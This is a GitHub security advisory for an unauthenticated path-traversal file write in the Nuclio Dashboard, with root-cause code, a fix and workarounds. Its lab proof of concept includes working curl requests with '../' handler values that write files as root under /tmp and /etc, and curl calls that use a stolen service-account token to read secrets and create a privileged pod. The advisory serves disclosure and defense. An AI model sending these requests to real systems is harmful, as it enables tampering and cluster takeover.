GHSA-WPCJ-RMV4-86QG

Vulnerability from github – Published: 2026-07-16 19:47 – Updated: 2026-07-16 19:47
VLAI
Summary
Nuclio: Unauthenticated path traversal in spec.handler allows arbitrary file write in Dashboard container
Details

Summary

Nuclio Dashboard exposes POST /api/functions without authentication by default (NOP auth mode). The spec.handler field (e.g., mymodule:myfunction) is parsed by functionconfig.ParseHandler() which splits on : only — no path validation is applied to the module portion.

During function build, writeFunctionSourceCodeToTempFile() passes the module name directly to path.Join(tempDir, moduleFileName). Go's path.Join internally calls path.Clean, which resolves ../ sequences and allows the resolved path to escape tempDir. The function then calls os.WriteFile at the attacker-controlled path with attacker-controlled content (base64-decoded spec.build.functionSourceCode).

The write executes in the Dashboard container process running as uid=0 (root), allowing writes to any filesystem location the process can access: /tmp, /etc, /usr/local/bin, /etc/cron.d, and more.

  • CVSS 3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N7.5 (High)
  • CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
  • Affected versions: Nuclio <= 1.15.27 (latest at time of research, dynamically verified)

Details

Root Cause

The vulnerability spans three functions. The path from user input to disk write is:

1. ParseHandler — no path validation (pkg/functionconfig/handler.go:25-38):

// pkg/functionconfig/handler.go:25-38
func ParseHandler(handler string) (string, string, error) {
    moduleAndEntrypoint := strings.Split(handler, ":")
    switch len(moduleAndEntrypoint) {
    case 1:
        return "", moduleAndEntrypoint[0], nil
    case 2:
        // Returns moduleFileName verbatim — no path sanitization
        return moduleAndEntrypoint[0], moduleAndEntrypoint[1], nil
    default:
        return "", "", errors.Errorf("Invalid handler name %s", handler)
    }
}

Input "../../../../tmp/vul007_proof.txt:handler" returns moduleFileName = "../../../../tmp/vul007_proof.txt".

2. writeFunctionSourceCodeToTempFile — unsafe path construction (pkg/processor/build/builder.go:613-661):

// builder.go:624-657 (abridged)
tempDir, err := b.mkDirUnderTemp("source")
// tempDir = /tmp/nuclio-build-<random>/source

runtimeExtension, err := b.getRuntimeFileExtensionByName(b.options.FunctionConfig.Spec.Runtime)

moduleFileName, entrypoint, err := functionconfig.ParseHandler(b.options.FunctionConfig.Spec.Handler)
// moduleFileName = "../../../../tmp/vul007_proof.txt" — attacker-controlled

if !strings.Contains(moduleFileName, ".") {
    moduleFileName = fmt.Sprintf("%s.%s", moduleFileName, runtimeExtension)
}
// If moduleFileName already contains ".", no extension is appended
// "../../../../tmp/vul007_proof.txt" contains "." -> stays as-is

sourceFilePath := path.Join(tempDir, moduleFileName)
// path.Join("/tmp/nuclio-build-227825660/source", "../../../../tmp/vul007_proof.txt")
// = "/tmp/vul007_proof.txt"   <-- escaped tempDir

b.logger.DebugWith("Writing function source code to temporary file", "functionPath", sourceFilePath)
if err := os.WriteFile(sourceFilePath, decodedFunctionSourceCode, os.FileMode(0644)); err != nil {
    // Writes attacker-controlled bytes to attacker-controlled path

3. cleanupTempDir does not remove the traversal file (builder.go:1047-1061):

// builder.go:1053
err := os.RemoveAll(b.tempDir)
// Only removes /tmp/nuclio-build-<random>/ — traversal file outside this tree persists

Path Traversal Calculation

tempDir  = /tmp/nuclio-build-227825660/source   (depth from /: 3 components)
handler  = "../../../../tmp/vul007_proof.txt:handler"
module   = "../../../../tmp/vul007_proof.txt"

path.Join("/tmp/nuclio-build-227825660/source", "../../../../tmp/vul007_proof.txt")
= path.Clean("/tmp/nuclio-build-227825660/source/../../../../tmp/vul007_proof.txt")

Traversal:
  /tmp/nuclio-build-227825660/source  (start)
  ../  -> /tmp/nuclio-build-227825660
  ../  -> /tmp
  ../  -> /  (filesystem root)
  ../  -> /  (cannot go above root)
  tmp/vul007_proof.txt -> /tmp/vul007_proof.txt

The same technique with 4x ../ reaches any path under /tmp, /etc, /usr, etc.

Full Attack Chain

Unauthenticated HTTP client
  -> POST /api/functions (no auth, NOP mode)
       dashboard/resource/function.go:156 storeAndDeployFunction()
  -> platform.CreateFunction()
       platform/kube/platform.go:193
  -> abstract/platform.go:191 HandleDeployFunction()
  -> abstract/platform.go:119 CreateFunctionBuild()
  -> builder.Build()
       processor/build/builder.go:195
  -> builder.resolveFunctionPath()
       builder.go:664
  -> builder.writeFunctionSourceCodeToTempFile()   <-- file write here
       builder.go:613
  -> os.WriteFile(attacker_path, attacker_content, 0644)
       builder.go:657

PoC — Steps to Reproduce

Environment Setup

The following steps set up an isolated kind cluster and deploy Nuclio 1.15.27. All commands were executed on an Ubuntu host with Docker 29.1.2.

Step 1: Create isolated kind cluster with Docker socket mounted

The Dashboard container builder requires access to Docker daemon. Create a kind cluster configuration that mounts the host Docker socket into the cluster node:

cat > /tmp/kind-vul007-config.yaml << 'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  extraMounts:
  - hostPath: /var/run/docker.sock
    containerPath: /var/run/docker.sock
EOF

kind create cluster --name vul-007 --config /tmp/kind-vul007-config.yaml

Expected output:

Creating cluster "vul-007" ...
 ✓ Ensuring node image (kindest/node:v1.27.3)
 ✓ Preparing nodes
 ✓ Writing configuration
 ✓ Starting control-plane
 ✓ Installing CNI
 ✓ Installing StorageClass
Set kubectl context to "kind-vul-007"

Verify Docker socket is available inside the cluster node:

docker exec vul-007-control-plane ls -la /var/run/docker.sock
# srw-rw---- 1 root 988 0 May 17 13:31 /var/run/docker.sock

Step 2: Deploy Nuclio via Helm

# Create namespace
kubectl --context kind-vul-007 create namespace nuclio

# Load container images (if pre-pulled)
kind load docker-image quay.io/nuclio/dashboard:1.15.27-amd64 --name vul-007
kind load docker-image quay.io/nuclio/controller:1.15.27-amd64 --name vul-007

# Install with Helm (chart from source: hack/k8s/helm/nuclio)
helm install nuclio ./hack/k8s/helm/nuclio \
  --namespace nuclio \
  --kube-context kind-vul-007 \
  --set controller.image.pullPolicy=Never \
  --set dashboard.image.pullPolicy=Never \
  --set registry.pushPullUrl="localhost:5000" \
  --set dashboard.containerBuilderKind=docker

Step 3: Wait for Dashboard to be ready

kubectl --context kind-vul-007 wait -n nuclio \
  --for=condition=ready pod -l nuclio.io/app=dashboard --timeout=90s

# Expected:
# pod/nuclio-dashboard-b4c5bb96f-txjkt condition met

Step 4: Expose Dashboard locally

kubectl --context kind-vul-007 port-forward -n nuclio svc/nuclio-dashboard 8073:8070 &
sleep 3

# Verify Dashboard is accessible
curl -s -o /dev/null -w "HTTP %{http_code}\n" http://localhost:8073/api/functions
# HTTP 200

Step 5: Create default project (required by Dashboard API)

curl -s -X POST http://localhost:8073/api/projects \
  -H "Content-Type: application/json" \
  -d '{"metadata":{"name":"default","namespace":"nuclio"},"spec":{"description":"default"}}'

Exploitation

Step 6: Send path traversal request

The handler field ../../../../tmp/vul007_proof.txt:handler instructs the build pipeline to write functionSourceCode content to /tmp/vul007_proof.txt inside the Dashboard container.

curl -v -X POST http://localhost:8073/api/functions \
  -H "Content-Type: application/json" \
  -H "x-nuclio-project-name: default" \
  -d '{
    "metadata": {"name": "vul007-poc", "namespace": "nuclio"},
    "spec": {
      "runtime": "python:3.11",
      "handler": "../../../../tmp/vul007_proof.txt:handler",
      "build": {
        "functionSourceCode": "UFJPVkVELVBBVEgtVFJBVkVSU0FMLVZVTDAwNw=="
      },
      "minReplicas": 0,
      "maxReplicas": 1
    }
  }'

functionSourceCode base64 decoded: PROVED-PATH-TRAVERSAL-VUL007

Expected response:

HTTP/1.1 202 Accepted

Step 7: Observe Dashboard build logs

kubectl --context kind-vul-007 logs -n nuclio deploy/nuclio-dashboard --tail=20 \
  | grep -E "temporary dir|Writing function source"

Actual log output (captured during verification, timestamp 2026-05-17 14:55:02 CST):

26.05.17 14:55:02.225 (D) dashboard.server.api/functions  Created temporary dir
  {"dir": "/tmp/nuclio-build-227825660/source"}

26.05.17 14:55:02.225 (D) dashboard.server.api/functions  Writing function source code to temporary file
  {"functionPath": "/tmp/vul007_proof.txt"}

The log confirms functionPath resolved to /tmp/vul007_proof.txt, which is outside the tempDir /tmp/nuclio-build-227825660/source. Path traversal is confirmed.

Step 8: Verify file written to traversal path

kubectl --context kind-vul-007 exec -n nuclio deploy/nuclio-dashboard \
  -- cat /tmp/vul007_proof.txt

Output:

PROVED-PATH-TRAVERSAL-VUL007
kubectl --context kind-vul-007 exec -n nuclio deploy/nuclio-dashboard \
  -- ls -la /tmp/vul007_proof.txt

Output:

-rw-r--r--    1 root     root            28 May 17 14:55 /tmp/vul007_proof.txt

Step 9: Write to /etc/ — broader impact demonstration

curl -s -X POST http://localhost:8073/api/functions \
  -H "Content-Type: application/json" \
  -H "x-nuclio-project-name: default" \
  -d '{
    "metadata": {"name": "vul007-poc2", "namespace": "nuclio"},
    "spec": {
      "runtime": "python:3.11",
      "handler": "../../../../etc/vul007-marker.txt:handler",
      "build": {
        "functionSourceCode": "VlVMMDA3LVBFUlNJU1RFTlQtTUFSS0VSLXJvb3Q="
      }
    }
  }'

Log evidence:

26.05.17 14:55:50.666 (D) dashboard.server.api/functions  Writing function source code to temporary file
  {"functionPath": "/etc/vul007-marker.txt"}
kubectl --context kind-vul-007 exec -n nuclio deploy/nuclio-dashboard \
  -- cat /etc/vul007-marker.txt
# VUL007-PERSISTENT-MARKER-root

Cleanup

kubectl --context kind-vul-007 delete nucliofunction vul007-poc vul007-poc2 -n nuclio 2>/dev/null || true
kind delete cluster --name vul-007

Impact

Direct Impact

An unauthenticated attacker with network access to the Nuclio Dashboard port can write arbitrary content to any path accessible by the Dashboard process (running as root) inside the Dashboard container.

Demonstrated write targets: - /tmp/ — confirmed (primary PoC) - /etc/ — confirmed (secondary PoC)

Potential high-impact write targets: - /etc/cron.d/ — write a cron job entry; if a cron daemon runs in the container, this achieves scheduled arbitrary command execution inside the container - /usr/local/bin/<name> — overwrite a binary called by dashboard processes - Any file path accessible by root within the container filesystem

Privilege Escalation

The Dashboard container runs as uid=0 (root). Its mounted Kubernetes ServiceAccount (nuclio-dashboard) holds the following RBAC permissions in the nuclio namespace:

Resources         Verbs
secrets           [*]
deployments.apps  [*]
pods              [*]
configmaps        [*]
services          [*]
cronjobs.batch    [*]

Verification: Using the SA token directly against the Kubernetes API:

# List secrets — HTTP 200
curl -k -H "Authorization: Bearer $SA_TOKEN" \
  "$K8S_API/api/v1/namespaces/nuclio/secrets"
# => returns helm release secret, nuclio SA secret

# Create privileged Deployment — HTTP 201
curl -k -X POST -H "Authorization: Bearer $SA_TOKEN" \
  -H "Content-Type: application/json" \
  "$K8S_API/apis/apps/v1/namespaces/nuclio/deployments" \
  -d '{"spec":{"template":{"spec":{"containers":[{"name":"t","image":"busybox","securityContext":{"privileged":true}}]}}}}'
# HTTP_CODE:201

An attacker who compromises the Dashboard container (via this file write vulnerability) gains access to this SA token and can create privileged workloads in the nuclio namespace, potentially escalating to cluster-level access depending on cluster configuration.

Scope

The file write is bounded to the Dashboard container filesystem. Host-level writes require additional preconditions (hostPath volumes, privileged container mode, or DinD configuration) not present in a standard Nuclio Kubernetes deployment.


Severity

CVSS 3.1 Score: 7.5 (High)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Metric Value Rationale
Attack Vector Network Dashboard API reachable over network
Attack Complexity Low Single HTTP request, no race condition
Privileges Required None Default NOP auth mode requires no credentials
User Interaction None Fully automated
Scope Unchanged Write confined to Dashboard container
Confidentiality None No data read in primary attack path
Integrity High Arbitrary file write as root in container
Availability None No service disruption caused by write

Affected Versions

  • Nuclio <= 1.15.27 (latest release at time of research)
  • Dynamically verified against quay.io/nuclio/dashboard:1.15.27-amd64 on 2026-05-17

The vulnerable code path (writeFunctionSourceCodeToTempFile in pkg/processor/build/builder.go) has been present since the functionSourceCode inline code feature was introduced.


Patched Versions

https://github.com/nuclio/nuclio/releases/tag/1.16.5


Workarounds

Option 1: Enable authentication on the Dashboard

Set NUCLIO_AUTH_KIND to a non-NOP value (e.g., iguazio) to require credentials. This prevents unauthenticated access to the API. Consult Nuclio documentation for supported auth providers.

# In Dashboard deployment env
- name: NUCLIO_AUTH_KIND
  value: "iguazio"

Option 2: Network-level access control

Restrict network access to the Dashboard port (default 8070) to trusted networks only. Do not expose the Dashboard directly to the internet.

Option 3: Drop root privileges in the Dashboard container

Run the Dashboard process as a non-root user to reduce the impact of container-level arbitrary file writes.


Remediation

Add a path boundary check in writeFunctionSourceCodeToTempFile after constructing sourceFilePath:

// pkg/processor/build/builder.go — fix for writeFunctionSourceCodeToTempFile
sourceFilePath := path.Join(tempDir, moduleFileName)

// Verify resolved path is within tempDir
absPath, err := filepath.Abs(sourceFilePath)
if err != nil {
    return "", errors.Wrap(err, "Failed to resolve absolute path")
}
absTempDir, err := filepath.Abs(tempDir)
if err != nil {
    return "", errors.Wrap(err, "Failed to resolve absolute tempDir")
}
if !strings.HasPrefix(absPath, absTempDir+string(os.PathSeparator)) {
    return "", errors.Errorf(
        "handler module path escapes build directory: %s", moduleFileName)
}

b.logger.DebugWith("Writing function source code to temporary file", "functionPath", absPath)
if err := os.WriteFile(absPath, decodedFunctionSourceCode, os.FileMode(0644)); err != nil {

Alternatively, reject any handler module name containing path separator characters before the build pipeline is invoked (at API request validation time).


Resources

  • Vulnerable file: pkg/processor/build/builder.go — function writeFunctionSourceCodeToTempFile, line 654
  • Parser: pkg/functionconfig/handler.go — function ParseHandler, line 25
  • Go path.Join behavior: https://pkg.go.dev/path#Join
  • CWE-22: https://cwe.mitre.org/data/definitions/22.html
  • OWASP Path Traversal: https://owasp.org/www-community/attacks/Path_Traversal
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/nuclio/nuclio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.16.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-52832"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-16T19:47:17Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nNuclio Dashboard exposes `POST /api/functions` without authentication by default (NOP auth mode). The `spec.handler` field (e.g., `mymodule:myfunction`) is parsed by `functionconfig.ParseHandler()` which splits on `:` only \u2014 no path validation is applied to the module portion.\n\nDuring function build, `writeFunctionSourceCodeToTempFile()` passes the module name directly to `path.Join(tempDir, moduleFileName)`. Go\u0027s `path.Join` internally calls `path.Clean`, which resolves `../` sequences and allows the resolved path to escape `tempDir`. The function then calls `os.WriteFile` at the attacker-controlled path with attacker-controlled content (base64-decoded `spec.build.functionSourceCode`).\n\nThe write executes in the Dashboard container process running as `uid=0 (root)`, allowing writes to any filesystem location the process can access: `/tmp`, `/etc`, `/usr/local/bin`, `/etc/cron.d`, and more.\n\n- **CVSS 3.1**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` \u2014 **7.5 (High)**\n- **CWE**: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)\n- **Affected versions**: Nuclio \u003c= 1.15.27 (latest at time of research, dynamically verified)\n\n---\n\n## Details\n\n### Root Cause\n\nThe vulnerability spans three functions. The path from user input to disk write is:\n\n**1. `ParseHandler` \u2014 no path validation** (`pkg/functionconfig/handler.go:25-38`):\n\n```go\n// pkg/functionconfig/handler.go:25-38\nfunc ParseHandler(handler string) (string, string, error) {\n    moduleAndEntrypoint := strings.Split(handler, \":\")\n    switch len(moduleAndEntrypoint) {\n    case 1:\n        return \"\", moduleAndEntrypoint[0], nil\n    case 2:\n        // Returns moduleFileName verbatim \u2014 no path sanitization\n        return moduleAndEntrypoint[0], moduleAndEntrypoint[1], nil\n    default:\n        return \"\", \"\", errors.Errorf(\"Invalid handler name %s\", handler)\n    }\n}\n```\n\nInput `\"../../../../tmp/vul007_proof.txt:handler\"` returns `moduleFileName = \"../../../../tmp/vul007_proof.txt\"`.\n\n**2. `writeFunctionSourceCodeToTempFile` \u2014 unsafe path construction** (`pkg/processor/build/builder.go:613-661`):\n\n```go\n// builder.go:624-657 (abridged)\ntempDir, err := b.mkDirUnderTemp(\"source\")\n// tempDir = /tmp/nuclio-build-\u003crandom\u003e/source\n\nruntimeExtension, err := b.getRuntimeFileExtensionByName(b.options.FunctionConfig.Spec.Runtime)\n\nmoduleFileName, entrypoint, err := functionconfig.ParseHandler(b.options.FunctionConfig.Spec.Handler)\n// moduleFileName = \"../../../../tmp/vul007_proof.txt\" \u2014 attacker-controlled\n\nif !strings.Contains(moduleFileName, \".\") {\n    moduleFileName = fmt.Sprintf(\"%s.%s\", moduleFileName, runtimeExtension)\n}\n// If moduleFileName already contains \".\", no extension is appended\n// \"../../../../tmp/vul007_proof.txt\" contains \".\" -\u003e stays as-is\n\nsourceFilePath := path.Join(tempDir, moduleFileName)\n// path.Join(\"/tmp/nuclio-build-227825660/source\", \"../../../../tmp/vul007_proof.txt\")\n// = \"/tmp/vul007_proof.txt\"   \u003c-- escaped tempDir\n\nb.logger.DebugWith(\"Writing function source code to temporary file\", \"functionPath\", sourceFilePath)\nif err := os.WriteFile(sourceFilePath, decodedFunctionSourceCode, os.FileMode(0644)); err != nil {\n    // Writes attacker-controlled bytes to attacker-controlled path\n```\n\n**3. `cleanupTempDir` does not remove the traversal file** (`builder.go:1047-1061`):\n\n```go\n// builder.go:1053\nerr := os.RemoveAll(b.tempDir)\n// Only removes /tmp/nuclio-build-\u003crandom\u003e/ \u2014 traversal file outside this tree persists\n```\n\n### Path Traversal Calculation\n\n```\ntempDir  = /tmp/nuclio-build-227825660/source   (depth from /: 3 components)\nhandler  = \"../../../../tmp/vul007_proof.txt:handler\"\nmodule   = \"../../../../tmp/vul007_proof.txt\"\n\npath.Join(\"/tmp/nuclio-build-227825660/source\", \"../../../../tmp/vul007_proof.txt\")\n= path.Clean(\"/tmp/nuclio-build-227825660/source/../../../../tmp/vul007_proof.txt\")\n\nTraversal:\n  /tmp/nuclio-build-227825660/source  (start)\n  ../  -\u003e /tmp/nuclio-build-227825660\n  ../  -\u003e /tmp\n  ../  -\u003e /  (filesystem root)\n  ../  -\u003e /  (cannot go above root)\n  tmp/vul007_proof.txt -\u003e /tmp/vul007_proof.txt\n```\n\nThe same technique with 4x `../` reaches any path under `/tmp`, `/etc`, `/usr`, etc.\n\n### Full Attack Chain\n\n```\nUnauthenticated HTTP client\n  -\u003e POST /api/functions (no auth, NOP mode)\n       dashboard/resource/function.go:156 storeAndDeployFunction()\n  -\u003e platform.CreateFunction()\n       platform/kube/platform.go:193\n  -\u003e abstract/platform.go:191 HandleDeployFunction()\n  -\u003e abstract/platform.go:119 CreateFunctionBuild()\n  -\u003e builder.Build()\n       processor/build/builder.go:195\n  -\u003e builder.resolveFunctionPath()\n       builder.go:664\n  -\u003e builder.writeFunctionSourceCodeToTempFile()   \u003c-- file write here\n       builder.go:613\n  -\u003e os.WriteFile(attacker_path, attacker_content, 0644)\n       builder.go:657\n```\n\n---\n\n## PoC \u2014 Steps to Reproduce\n\n### Environment Setup\n\nThe following steps set up an isolated kind cluster and deploy Nuclio 1.15.27. All commands were executed on an Ubuntu host with Docker 29.1.2.\n\n**Step 1: Create isolated kind cluster with Docker socket mounted**\n\nThe Dashboard container builder requires access to Docker daemon. Create a kind cluster configuration that mounts the host Docker socket into the cluster node:\n\n```bash\ncat \u003e /tmp/kind-vul007-config.yaml \u003c\u003c \u0027EOF\u0027\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nnodes:\n- role: control-plane\n  extraMounts:\n  - hostPath: /var/run/docker.sock\n    containerPath: /var/run/docker.sock\nEOF\n\nkind create cluster --name vul-007 --config /tmp/kind-vul007-config.yaml\n```\n\nExpected output:\n```\nCreating cluster \"vul-007\" ...\n \u2713 Ensuring node image (kindest/node:v1.27.3)\n \u2713 Preparing nodes\n \u2713 Writing configuration\n \u2713 Starting control-plane\n \u2713 Installing CNI\n \u2713 Installing StorageClass\nSet kubectl context to \"kind-vul-007\"\n```\n\nVerify Docker socket is available inside the cluster node:\n```bash\ndocker exec vul-007-control-plane ls -la /var/run/docker.sock\n# srw-rw---- 1 root 988 0 May 17 13:31 /var/run/docker.sock\n```\n\n**Step 2: Deploy Nuclio via Helm**\n\n```bash\n# Create namespace\nkubectl --context kind-vul-007 create namespace nuclio\n\n# Load container images (if pre-pulled)\nkind load docker-image quay.io/nuclio/dashboard:1.15.27-amd64 --name vul-007\nkind load docker-image quay.io/nuclio/controller:1.15.27-amd64 --name vul-007\n\n# Install with Helm (chart from source: hack/k8s/helm/nuclio)\nhelm install nuclio ./hack/k8s/helm/nuclio \\\n  --namespace nuclio \\\n  --kube-context kind-vul-007 \\\n  --set controller.image.pullPolicy=Never \\\n  --set dashboard.image.pullPolicy=Never \\\n  --set registry.pushPullUrl=\"localhost:5000\" \\\n  --set dashboard.containerBuilderKind=docker\n```\n\n**Step 3: Wait for Dashboard to be ready**\n\n```bash\nkubectl --context kind-vul-007 wait -n nuclio \\\n  --for=condition=ready pod -l nuclio.io/app=dashboard --timeout=90s\n\n# Expected:\n# pod/nuclio-dashboard-b4c5bb96f-txjkt condition met\n```\n\n**Step 4: Expose Dashboard locally**\n\n```bash\nkubectl --context kind-vul-007 port-forward -n nuclio svc/nuclio-dashboard 8073:8070 \u0026\nsleep 3\n\n# Verify Dashboard is accessible\ncurl -s -o /dev/null -w \"HTTP %{http_code}\\n\" http://localhost:8073/api/functions\n# HTTP 200\n```\n\n**Step 5: Create default project (required by Dashboard API)**\n\n```bash\ncurl -s -X POST http://localhost:8073/api/projects \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"metadata\":{\"name\":\"default\",\"namespace\":\"nuclio\"},\"spec\":{\"description\":\"default\"}}\u0027\n```\n\n---\n\n### Exploitation\n\n**Step 6: Send path traversal request**\n\nThe `handler` field `../../../../tmp/vul007_proof.txt:handler` instructs the build pipeline to write `functionSourceCode` content to `/tmp/vul007_proof.txt` inside the Dashboard container.\n\n```bash\ncurl -v -X POST http://localhost:8073/api/functions \\\n  -H \"Content-Type: application/json\" \\\n  -H \"x-nuclio-project-name: default\" \\\n  -d \u0027{\n    \"metadata\": {\"name\": \"vul007-poc\", \"namespace\": \"nuclio\"},\n    \"spec\": {\n      \"runtime\": \"python:3.11\",\n      \"handler\": \"../../../../tmp/vul007_proof.txt:handler\",\n      \"build\": {\n        \"functionSourceCode\": \"UFJPVkVELVBBVEgtVFJBVkVSU0FMLVZVTDAwNw==\"\n      },\n      \"minReplicas\": 0,\n      \"maxReplicas\": 1\n    }\n  }\u0027\n```\n\n`functionSourceCode` base64 decoded: `PROVED-PATH-TRAVERSAL-VUL007`\n\nExpected response:\n```\nHTTP/1.1 202 Accepted\n```\n\n**Step 7: Observe Dashboard build logs**\n\n```bash\nkubectl --context kind-vul-007 logs -n nuclio deploy/nuclio-dashboard --tail=20 \\\n  | grep -E \"temporary dir|Writing function source\"\n```\n\nActual log output (captured during verification, timestamp 2026-05-17 14:55:02 CST):\n```\n26.05.17 14:55:02.225 (D) dashboard.server.api/functions  Created temporary dir\n  {\"dir\": \"/tmp/nuclio-build-227825660/source\"}\n\n26.05.17 14:55:02.225 (D) dashboard.server.api/functions  Writing function source code to temporary file\n  {\"functionPath\": \"/tmp/vul007_proof.txt\"}\n```\n\nThe log confirms `functionPath` resolved to `/tmp/vul007_proof.txt`, which is\n**outside** the tempDir `/tmp/nuclio-build-227825660/source`. Path traversal is confirmed.\n\n**Step 8: Verify file written to traversal path**\n\n```bash\nkubectl --context kind-vul-007 exec -n nuclio deploy/nuclio-dashboard \\\n  -- cat /tmp/vul007_proof.txt\n```\n\nOutput:\n```\nPROVED-PATH-TRAVERSAL-VUL007\n```\n\n```bash\nkubectl --context kind-vul-007 exec -n nuclio deploy/nuclio-dashboard \\\n  -- ls -la /tmp/vul007_proof.txt\n```\n\nOutput:\n```\n-rw-r--r--    1 root     root            28 May 17 14:55 /tmp/vul007_proof.txt\n```\n\n**Step 9: Write to /etc/ \u2014 broader impact demonstration**\n\n```bash\ncurl -s -X POST http://localhost:8073/api/functions \\\n  -H \"Content-Type: application/json\" \\\n  -H \"x-nuclio-project-name: default\" \\\n  -d \u0027{\n    \"metadata\": {\"name\": \"vul007-poc2\", \"namespace\": \"nuclio\"},\n    \"spec\": {\n      \"runtime\": \"python:3.11\",\n      \"handler\": \"../../../../etc/vul007-marker.txt:handler\",\n      \"build\": {\n        \"functionSourceCode\": \"VlVMMDA3LVBFUlNJU1RFTlQtTUFSS0VSLXJvb3Q=\"\n      }\n    }\n  }\u0027\n```\n\nLog evidence:\n```\n26.05.17 14:55:50.666 (D) dashboard.server.api/functions  Writing function source code to temporary file\n  {\"functionPath\": \"/etc/vul007-marker.txt\"}\n```\n\n```bash\nkubectl --context kind-vul-007 exec -n nuclio deploy/nuclio-dashboard \\\n  -- cat /etc/vul007-marker.txt\n# VUL007-PERSISTENT-MARKER-root\n```\n\n---\n\n### Cleanup\n\n```bash\nkubectl --context kind-vul-007 delete nucliofunction vul007-poc vul007-poc2 -n nuclio 2\u003e/dev/null || true\nkind delete cluster --name vul-007\n```\n\n---\n\n## Impact\n\n### Direct Impact\n\nAn unauthenticated attacker with network access to the Nuclio Dashboard port can write arbitrary content to any path accessible by the Dashboard process (running as root) inside the Dashboard container.\n\nDemonstrated write targets:\n- `/tmp/` \u2014 confirmed (primary PoC)\n- `/etc/` \u2014 confirmed (secondary PoC)\n\nPotential high-impact write targets:\n- `/etc/cron.d/` \u2014 write a cron job entry; if a cron daemon runs in the container, this\n  achieves scheduled arbitrary command execution inside the container\n- `/usr/local/bin/\u003cname\u003e` \u2014 overwrite a binary called by dashboard processes\n- Any file path accessible by root within the container filesystem\n\n### Privilege Escalation\n\nThe Dashboard container runs as `uid=0 (root)`. Its mounted Kubernetes ServiceAccount (`nuclio-dashboard`) holds the following RBAC permissions in the `nuclio` namespace:\n\n```\nResources         Verbs\nsecrets           [*]\ndeployments.apps  [*]\npods              [*]\nconfigmaps        [*]\nservices          [*]\ncronjobs.batch    [*]\n```\n\nVerification: Using the SA token directly against the Kubernetes API:\n\n```bash\n# List secrets \u2014 HTTP 200\ncurl -k -H \"Authorization: Bearer $SA_TOKEN\" \\\n  \"$K8S_API/api/v1/namespaces/nuclio/secrets\"\n# =\u003e returns helm release secret, nuclio SA secret\n\n# Create privileged Deployment \u2014 HTTP 201\ncurl -k -X POST -H \"Authorization: Bearer $SA_TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  \"$K8S_API/apis/apps/v1/namespaces/nuclio/deployments\" \\\n  -d \u0027{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"t\",\"image\":\"busybox\",\"securityContext\":{\"privileged\":true}}]}}}}\u0027\n# HTTP_CODE:201\n```\n\nAn attacker who compromises the Dashboard container (via this file write vulnerability) gains access to this SA token and can create privileged workloads in the `nuclio` namespace, potentially escalating to cluster-level access depending on cluster configuration.\n\n### Scope\n\nThe file write is bounded to the Dashboard **container** filesystem. Host-level writes require additional preconditions (hostPath volumes, privileged container mode, or DinD configuration) not present in a standard Nuclio Kubernetes deployment.\n\n---\n\n## Severity\n\n**CVSS 3.1 Score: 7.5 (High)**\n\n```\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n```\n\n| Metric | Value | Rationale |\n|--------|-------|-----------|\n| Attack Vector | Network | Dashboard API reachable over network |\n| Attack Complexity | Low | Single HTTP request, no race condition |\n| Privileges Required | None | Default NOP auth mode requires no credentials |\n| User Interaction | None | Fully automated |\n| Scope | Unchanged | Write confined to Dashboard container |\n| Confidentiality | None | No data read in primary attack path |\n| Integrity | High | Arbitrary file write as root in container |\n| Availability | None | No service disruption caused by write |\n\n---\n\n## Affected Versions\n\n- **Nuclio \u003c= 1.15.27** (latest release at time of research)\n- Dynamically verified against `quay.io/nuclio/dashboard:1.15.27-amd64` on 2026-05-17\n\nThe vulnerable code path (`writeFunctionSourceCodeToTempFile` in `pkg/processor/build/builder.go`)\nhas been present since the `functionSourceCode` inline code feature was introduced.\n\n---\n\n## Patched Versions\n\nhttps://github.com/nuclio/nuclio/releases/tag/1.16.5\n\n---\n\n## Workarounds\n\n**Option 1: Enable authentication on the Dashboard**\n\nSet `NUCLIO_AUTH_KIND` to a non-NOP value (e.g., `iguazio`) to require credentials. This prevents unauthenticated access to the API. Consult Nuclio documentation for supported auth providers.\n\n```yaml\n# In Dashboard deployment env\n- name: NUCLIO_AUTH_KIND\n  value: \"iguazio\"\n```\n\n**Option 2: Network-level access control**\n\nRestrict network access to the Dashboard port (default 8070) to trusted networks only. Do not expose the Dashboard directly to the internet.\n\n**Option 3: Drop root privileges in the Dashboard container**\n\nRun the Dashboard process as a non-root user to reduce the impact of container-level arbitrary file writes.\n\n---\n\n## Remediation\n\nAdd a path boundary check in `writeFunctionSourceCodeToTempFile` after constructing `sourceFilePath`:\n\n```go\n// pkg/processor/build/builder.go \u2014 fix for writeFunctionSourceCodeToTempFile\nsourceFilePath := path.Join(tempDir, moduleFileName)\n\n// Verify resolved path is within tempDir\nabsPath, err := filepath.Abs(sourceFilePath)\nif err != nil {\n    return \"\", errors.Wrap(err, \"Failed to resolve absolute path\")\n}\nabsTempDir, err := filepath.Abs(tempDir)\nif err != nil {\n    return \"\", errors.Wrap(err, \"Failed to resolve absolute tempDir\")\n}\nif !strings.HasPrefix(absPath, absTempDir+string(os.PathSeparator)) {\n    return \"\", errors.Errorf(\n        \"handler module path escapes build directory: %s\", moduleFileName)\n}\n\nb.logger.DebugWith(\"Writing function source code to temporary file\", \"functionPath\", absPath)\nif err := os.WriteFile(absPath, decodedFunctionSourceCode, os.FileMode(0644)); err != nil {\n```\n\nAlternatively, reject any 